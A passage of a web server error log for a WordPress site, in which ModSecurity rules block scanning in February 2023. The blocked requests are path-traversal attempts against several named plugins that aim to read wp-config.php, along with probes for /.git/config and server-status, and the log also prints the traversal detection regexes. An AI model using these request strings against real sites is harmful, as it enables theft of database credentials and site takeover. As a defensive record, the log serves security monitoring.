"OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y97qDJ_wDgKVVcyABLKZ4wAAAMw"] [Sun Feb 05 03:36:29.287581 2023] [ssl:warn] [pid 25573:tid 139644188768128] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Feb 05 03:36:29.423000 2023] [ssl:warn] [pid 25574:tid 139644188768128] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Feb 05 03:36:29.905176 2023] [ssl:warn] [pid 25574:tid 139644188768128] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Feb 05 03:36:31.654667 2023] [ssl:warn] [pid 25574:tid 139644188768128] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Feb 05 03:36:33.913750 2023] [ssl:warn] [pid 25998:tid 140083522611072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Feb 05 03:36:34.026269 2023] [ssl:warn] [pid 25999:tid 140083522611072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Feb 05 04:27:17.630724 2023] [autoindex:error] [pid 26018:tid 140083235645184] [client 47.110.160.63:51184] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/file/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/blocks/file/index.php [Sun Feb 05 10:11:11.050344 2023] [:error] [pid 27231:tid 140083244037888] [client 15.236.39.162:33726] [client 15.236.39.162] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-22.php"] [unique_id "Y9_HD4_jP3-057NlMJuZeAAAAMM"] [Sun Feb 05 11:26:33.841217 2023] [autoindex:error] [pid 26017:tid 140083193681664] [client 192.185.81.238:36020] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/file/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/blocks/file/index.php [Sun Feb 05 11:26:35.808477 2023] [autoindex:error] [pid 26016:tid 140083333596928] [client 192.185.81.238:36024] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/file/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/blocks/file/index.php [Sun Feb 05 15:59:28.963468 2023] [autoindex:error] [pid 22006:tid 140083118147328] [client 43.153.116.199:44450] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Feb 05 17:19:57.892418 2023] [autoindex:error] [pid 26018:tid 140083168503552] [client 64.91.226.62:47452] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2023/02/06 03:13:23 [error] 25980#25980: *1042280 connect() failed (111: Connection refused) while connecting to upstream, client: 198.199.72.26, server: investigacionperu.com, request: "POST /wp-cron.php?doing_wp_cron=1675671203.3389310836791992187500 HTTP/1.1", upstream: "http://198.199.72.26:8181/wp-cron.php?doing_wp_cron=1675671203.3389310836791992187500", host: "investigacionperu.com", referrer: "https://investigacionperu.com/wp-cron.php?doing_wp_cron=1675671203.3389310836791992187500" [Mon Feb 06 03:13:24.328917 2023] [ssl:warn] [pid 18944:tid 139818303666048] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Feb 06 03:13:24.453505 2023] [ssl:warn] [pid 18945:tid 139818303666048] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Feb 06 03:13:24.884698 2023] [ssl:warn] [pid 18945:tid 139818303666048] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Feb 06 03:13:27.604033 2023] [ssl:warn] [pid 18945:tid 139818303666048] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Feb 06 03:13:31.187382 2023] [ssl:warn] [pid 19419:tid 140273652266880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Feb 06 03:13:31.322712 2023] [ssl:warn] [pid 19420:tid 140273652266880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Feb 06 09:44:39.568309 2023] [ssl:warn] [pid 19420:tid 140273652266880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/02/07 00:43:17 [error] 4054#4054: *1108839 access forbidden by rule, client: 3.87.129.94, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/02/07 00:43:33 [error] 4054#4054: *1108965 access forbidden by rule, client: 139.162.214.192, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/02/07 00:43:34 [error] 4054#4054: *1108997 access forbidden by rule, client: 206.189.28.149, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/02/07 00:43:34 [error] 4054#4054: *1109030 access forbidden by rule, client: 139.162.214.192, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Feb 07 00:43:34.281055 2023] [authz_core:error] [pid 4077:tid 140273237559040] [client 139.162.214.192:52328] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Tue Feb 07 00:43:34.411268 2023] [authz_core:error] [pid 4078:tid 140273296307968] [client 206.189.28.149:52312] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/02/07 00:43:34 [error] 4054#4054: *1109057 access forbidden by rule, client: 138.68.154.197, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/02/07 00:43:35 [error] 4055#4055: *1109097 access forbidden by rule, client: 159.223.236.123, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/02/07 00:43:36 [error] 4055#4055: *1109132 access forbidden by rule, client: 139.162.214.192, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Feb 07 00:43:36.349039 2023] [authz_core:error] [pid 4235:tid 140273321486080] [client 139.162.214.192:52416] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/02/07 00:43:37 [error] 4054#4054: *1109151 access forbidden by rule, client: 139.59.138.104, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Feb 07 00:43:37.293007 2023] [authz_core:error] [pid 4079:tid 140273245951744] [client 139.59.138.104:52440] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Wed Feb 08 03:31:33.817157 2023] [autoindex:error] [pid 22981:tid 140380581467904] [client 43.153.116.189:55526] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Feb 08 07:19:19.251106 2023] [:error] [pid 22392:tid 140380360091392] [client 5.188.62.174:34674] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y-OTR0C5ZPkx6vHh8dYrzQAAAJQ"] [Wed Feb 08 16:07:08.675527 2023] [:error] [pid 22981:tid 140380334913280] [client 138.97.41.70:41460] [client 138.97.41.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F..%2F..%2F&filename=wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "Y-QO_N431KYFQiorNwaFMAAAANc"] [Thu Feb 09 02:42:17.197680 2023] [autoindex:error] [pid 22391:tid 140380460803840] [client 43.153.116.199:33976] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Feb 09 13:15:25.370264 2023] [autoindex:error] [pid 31164:tid 140660891895552] [client 43.130.155.25:60622] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Feb 09 22:39:16.138547 2023] [:error] [pid 31163:tid 140660925466368] [client 5.188.62.140:54960] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y-W8ZIorPzIytxRyHx1a8gAAAFA"] [Sat Feb 11 12:39:13.715902 2023] [:error] [pid 7828:tid 140505459091200] [client 31.186.48.232:38540] [client 31.186.48.232] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php"] [unique_id "Y-fSwfZixTDgafCgjr9PlQAAAIQ"] [Sat Feb 11 18:38:27.537651 2023] [:error] [pid 8123:tid 140505442305792] [client 85.215.105.140:50174] [client 85.215.105.140] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "Y-gm8-4o84NGUxMfNRBeLAAAAMY"], referer: https://www.google.com/search? [Sat Feb 11 18:38:29.377896 2023] [:error] [pid 7826:tid 140505450698496] [client 85.215.105.140:50176] [client 85.215.105.140] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=handle_downloads&alg_wc_pif_download_file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y-gm9WrQpy7rivS1wh0zxwAAAAU"], referer: https://www.google.com/search? [Sat Feb 11 18:38:31.238627 2023] [:error] [pid 8123:tid 140505300043520] [client 85.215.105.140:50178] [client 85.215.105.140] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "Y-gm9-4o84NGUxMfNRBeLQAAAM4"], referer: https://www.google.com/search? [Sat Feb 11 18:38:32.814188 2023] [:error] [pid 7826:tid 140505274865408] [client 85.215.105.140:50180] [client 85.215.105.140] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "Y-gm-GrQpy7rivS1wh0zyAAAABE"], referer: https://www.google.com/search? [Sat Feb 11 18:38:35.251698 2023] [:error] [pid 8123:tid 140505459091200] [client 85.215.105.140:50182] [client 85.215.105.140] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "Y-gm--4o84NGUxMfNRBeLgAAAMQ"], referer: https://www.google.com/search? [Sat Feb 11 18:40:43.968040 2023] [:error] [pid 7827:tid 140505450698496] [client 85.215.105.140:50324] [client 85.215.105.140] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=./../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "Y-gne9119lp24i96fcfyZgAAAEU"], referer: https://www.google.com/search? [Sat Feb 11 22:47:10.402372 2023] [autoindex:error] [pid 7828:tid 140505274865408] [client 43.130.144.143:58868] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Feb 12 17:11:42.169450 2023] [:error] [pid 23078:tid 140691384497920] [client 194.169.175.26:48556] [client 194.169.175.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "Y-lkHlj-aIQd1faSLazCZwAAANM"], referer: https://www.google.com/search? [Sun Feb 12 17:11:44.912790 2023] [:error] [pid 22769:tid 140691485210368] [client 194.169.175.26:48562] [client 194.169.175.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=handle_downloads&alg_wc_pif_download_file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y-lkIDUcol_cWQ3Drs4aEgAAAIc"], referer: https://www.google.com/search? [Sun Feb 12 17:11:56.217186 2023] [:error] [pid 23078:tid 140691476817664] [client 194.169.175.26:48566] [client 194.169.175.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "Y-lkLFj-aIQd1faSLazCaAAAAMg"], referer: https://www.google.com/search? [Sun Feb 12 17:12:00.592151 2023] [:error] [pid 22768:tid 140691618535168] [client 194.169.175.26:48574] [client 194.169.175.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "Y-lkMK_2Pnw5P-0tqZu11QAAAEA"], referer: https://www.google.com/search? [Sun Feb 12 17:12:03.850645 2023] [:error] [pid 23078:tid 140691610142464] [client 194.169.175.26:48578] [client 194.169.175.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line 